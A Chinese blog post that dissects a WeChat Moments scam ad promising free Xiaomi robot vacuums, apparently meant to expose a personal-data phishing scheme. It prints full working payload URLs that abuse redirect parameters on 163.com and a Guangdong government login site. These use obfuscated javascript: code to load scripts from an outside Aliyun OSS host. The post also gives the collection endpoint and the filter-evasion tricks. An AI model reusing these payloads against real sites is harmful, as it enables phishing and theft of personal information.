前两天在朋友圈突然看到有发 小米新店开业 送千台扫地机器人的 广告,出于天上不会掉馅饼到我身上的原则 我选择忽略了,但是没多久 看到他又晒了个物流订单,于是还是点开看了一下,发现微信打开的网站还蛮正规的,但是又不是小米的域名,于是我留了个心眼,填了个假地址和电话,然后同样也生成了物流单消息。于是准备来看看到底是真是假。

  首先朋友圈的广告是这样的

然后我把图片的二维码发给电脑版微信,电脑版微信扫码后直接 直接打开了腾讯官网,这个时候我就确定看到是那个网站被挂马了,于是就解码了下二维码  发现地址是这样的:

https://shequn.wenwen.163.com/launch.html?url=jav ascr
ipt:a=\u0061\u0074\u006f\u0062`aW1wb3J0KCcvL3VjYnQub3NzLWFjY2VsZXJhdGUuYWxpeXVuY3MuY29tL3gvMTYzX3JrJyk=`;\u0065\u0076\u0061\u006c(a)

分析了一下 居然是一个 base64的js脚本,像是通过个人的163博客做为基本跳转的  脚本也很简单

(function(url) {

				if (url) {

					location.href = url

				}

			})(getQuery('url'))

			function getQuery(name) {

				var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");

				var r = window.location.search.substr(1).match(reg);

				if (r != null) return unescape(r[2]);

				return null;

			}

  

通过base64 解码 js 代码 是 :import('//ucbt.oss-accelerate.aliyuncs.com/x/163_rk')

才发现他居然是通过阿里云的oss 做具体脚本跳转的

下载代码后 发现还有几层跳转

最后跳到了 广东政务服务网 广东省统一身份认证平台  https://tyrz.gd.gov.cn,

最后的跳转地址是:https://tyrz.gd.gov.cn/pscp/sso/static/countrytransfer?src=javas%09cript%3Aa%3D%5Cu0061%5Cu0074%5Cu006f%5Cu0062%60ZG9jdW1lbnQuYm9keS5oaWRkZW49dHJ1ZTtkb2N1bWVudC50aXRsZT0nJzt2PWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3Yuc3JjPSIvL3VjYnQub3NzLWFjY2VsZXJhdGUuYWxpeXVuY3MuY29tL3gvZ2Rndl9sZCI7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw%60%3B%5Cu0065%5Cu0076%5Cu0061%5Cu006c%28a%29%2F%2F&xkey=52&bhufjr

解析这段js 的内容是

document.body.hidden=true;document.title='';v=document.createElement('script');v.src="//ucbt.oss-accelerate.aliyuncs.com/x/gdgv_ld";document.head.appendChild(v);

  跳转到了真正界面

//ucbt.oss-accelerate.aliyuncs.com/x/gdgv_ld

然后他通过 让你填写手机号 地址等信息  进行个人信息收集,最后提交到了一个网站:https://dxjyxq.com/admin/token/saveAddress_2/?name=1111&tel=15388880000&region=%E7%A6%8F%E5%BB%BA+%2F+%E5%AE%81%E5%BE%B7+%2F+%E9%9C%9E%E6%B5%A6%E5%8E%BF&address=111

我开始以为这个网站是没备案的,一查才发现居然是备案的域名

还有他建立了一个qq群,目前qq群人数还在持续增加,目前不太明确具体他收集这些信息是干什么用的 ,但是总的还是那句话 天上不会掉馅饼啊,

整理了一下思路,感觉作者还是很有才华的

首先通过 url 注入的第一段代码来看 他利用加空格、换行符等特殊文本来绕过 注入检测

第二个是 利用 知名网站的 微信js 认证脚本 确保 你在微信里面访问(不仅仅是判断浏览器,而是判断微信js 是否可以出售成功,然后隐藏了分享等按钮)

关于朋友圈出现的小米新店广告骗局(非法获取个人消息)木马通过广东政务服务网(tyrz.gd.gov.cn)的url漏洞显示的更多相关文章

  1. golang-vue实现微信小程序分享到朋友圈

    最近涉及到微信小程序分享到朋友圈,不知道微信为什么不直接接口分享,咱也不敢佛,咱也不敢问,只能百度问度娘,看官方文档,网上的一些分享五花八门,每一个重点的,所以整理了一下到底怎样生成二维码分享图片才是 ...

  2. 页面分享功能,分享好友、朋友圈判断,用share_type做标记 这里用的是jweixin-1.3.2.js

    这里用的是jweixin-1.3.2.js trigger: function (res) { //判断分享的状态,好友.朋友圈 localStorage.setItem("share_ty ...

  3. H5投放在朋友圈广告做压力测试

    一.环境 MacOS Sierra 二.背景 朋友圈广告投放的H5需要做ab压测,这里不赘述. 具体官方文档如下:http://ad.weixin.qq.com/learn/n10 三.正文 (1)别 ...

  4. 微信朋友圈转疯了(golang写小爬虫抓取朋友圈文章)

    很多人在朋友圈里转发一些文章,标题都是什么转疯啦之类,虽然大多都也是广告啦,我觉得还蛮无聊的,但是的确是有一些文章是非常值得收藏的,比如老婆经常就会收藏一些养生和美容的文章在微信里看. 今天就突发奇想 ...

  5. 微信封号浪潮再起 A货假代购还能在朋友圈泛滥多久?

    你的微信朋友圈是不是很活跃?是不是被很多所谓的名品所包围?没错,这些很多都是A货或假代购的伎俩.如果xmyanke的微信朋友圈出现这些东东,我就会直接屏蔽他的朋友圈权限.具体方法是:打开他的微信详细资 ...

  6. 九度OJ 朋友圈 -- 并查集

    题目地址:http://ac.jobdu.com/problem.php?pid=1526 题目描述: 假如已知有n个人和m对好友关系(存于数字r).如果两个人是直接或间接的好友(好友的好友的好友.. ...

  7. Android之微信朋友圈UI实现--ExpandableListView+GridView

    PS:我们都知道微信,更是知道朋友圈,很多人在朋友圈里卖起了化妆品,打入广告等为自己做一下推广,里面会附带一写好看的图片,上面有标题,有描述,整体布局每场的美观,那么这是怎么实现的呢,有些人可能会单个 ...

  8. 微信JS-SDK接口,分享到朋友圈”按钮点击状态及自定义分享内容接口

    jssdk.php 接口文件class JSSDK { private $appId; private $appSecret; public function __construct($appId, ...

  9. python通过人脸识别全面分析好友,一起看透你的“朋友圈”

    微信:一个提供即时通讯服务的应用程序,更是一种生活方式,超过数十亿的使用者,越来越多的人选择使用它来沟通交流. 不知从何时起,我们的生活离不开微信,每天睁开眼的第一件事就是打开微信,关注着朋友圈里好友 ...

  10. QQ空间/朋友圈类界面的搭建

    类似于QQ空间的布局主要是在说说信息.点赞.回复三大部分的自适应布局上. 当我们需要搭建类似QQ空间.微信朋友圈的界面的时候,可做如下操作: 创建一个对应的model类: 创建一个对应model类的f ...

随机推荐

  1. eclipse 汉化语言包/中文补丁/简中设置/中英互换

    eclipse 汉化语言包/中文补丁/简中设置/中英互换 汉化很简单,使用eclipse内置的软件下载就可以,不需要下载压缩包 官方的说明 Open the install wizard with ' ...

  2. 安装两个jdk Windows系统

    安装两个jdk Windows系统 本来装的是Java 8,现在有一个新的项目要到手上,需要的环境是Java 7,想着还有别的要用,所以就装两个在电脑上 jdk的下载直接去官网就行,不知道怎么下就看这 ...

  3. SVN Windows10的安装

    SVN Windows安装与配置 先去到官网的下载链接:Download Apache Subversion Sources 然后点这个 binary packages 在这里能看到大多数的操作系统的 ...

  4. 力扣190(java)-颠倒二进制位(简单)

    题目: 颠倒给定的 32 位无符号整数的二进制位. 提示: 请注意,在某些语言(如 Java)中,没有无符号整数类型.在这种情况下,输入和输出都将被指定为有符号整数类型,并且不应影响您的实现,因为无论 ...

  5. 第 7章 Python 爬虫框架 Scrapy(上)

    第 7章 Python 爬虫框架 Scrapy(上) 编写爬虫可以看成行军打仗,基本的角色有两个:士兵和将军,士兵冲锋陷阵,而将军更多地是调兵遣将.框架就像一个将军,里面包含了爬虫的全部流程.异常处理 ...

  6. 对接HiveMetaStore,拥抱开源大数据

    本文分享自华为云社区<对接HiveMetaStore,拥抱开源大数据>,作者:睡觉是大事. 1. 前言 适用版本:9.1.0及以上 在大数据融合分析时代,面对海量的数据以及各种复杂的查询, ...

  7. 开源 1 年半 star 破 1.2 万的 Dapr 是如何在阿里落地的?

    简介: Dapr 是 2019 年 10 月微软开源的可移植.事件驱动分布式运行时,它使开发人员能够轻松地构建运行在云平台和边缘的弹性而微服务化的无状态和有状态的应用程序,从而降低基于微服务架构构建现 ...

  8. Alibaba Cloud Toolkit 中SLS插件助力线上服务问题排查

    ​简介:Alibaba Cloud Toolkit 是一款非常优秀的插件,新增SLS日志服务的功能,针对软件开发者日常工作中常见的问题排查场景,将日志服务平台的功能集成到ide当中,省去了不同窗口之间 ...

  9. [Go] golang-migrate/migrate 快速使用指南

    1. CLI 用途的安装 [文档] [确保] CLI 工具使用 go 命令安装时,不应该在 go.mod 所在的目录中执行命令,也就是先进入到其它非项目目录内. $ go get -tags 'pos ...

  10. SpringBoot的@Resource和@Autowired+@Qualifier使用

    1.区别 参考: https://blog.csdn.net/xhbzl/article/details/126765893 https://blog.csdn.net/qq_40263124/art ...